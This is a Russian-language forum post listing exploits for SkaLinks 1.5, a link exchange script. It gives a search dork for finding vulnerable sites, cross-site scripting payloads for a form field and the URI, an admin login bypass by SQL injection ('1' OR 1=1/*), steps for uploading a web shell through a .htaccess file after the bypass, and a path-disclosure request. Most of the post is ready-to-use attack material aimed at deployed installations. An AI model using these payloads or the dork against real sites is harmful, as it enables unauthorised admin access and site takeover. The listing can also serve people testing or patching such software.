![]() |
Уязвимости SkaLinks
Уязвимости SkaLinks - Link Exchange Script Product : SkaLinks Version : 1.5 Dork : Powered by SkaLinks Site: http://www.skalinks.com/ Founded by: Dimi4 Date : 29.01.09 Cross Site Scripting/vuln/skalinks_1_5/add_url.php Уязвимая переменная: link_url Пример запроса: Код:
POST /vuln/skalinks_1_5/add_url.php HTTP/1.0Код:
link_full_description=</textarea><script>alert()</script>Обход авторизации в админке Бажная функция: PHP код:
Admin name : 1' OR 1=1/* Cross Site Scripting in URI Код:
http://127.0.0.1/vuln/skalinks_1_5/admin/index.php/>"><script>alert()</script>Способ заливки шеллаТакой слособ прокатит только если криво выставлены права. Вообщем после удачного обхода авторизации, через дамп льем файл .htaccess. Содержимое: Код:
allow from allРаскрытие путей Код:
http://127.0.0.1/vuln/skalinks_1_5/search.php?url=test&Search=Search&search_type=URL |
| Время: 03:54 |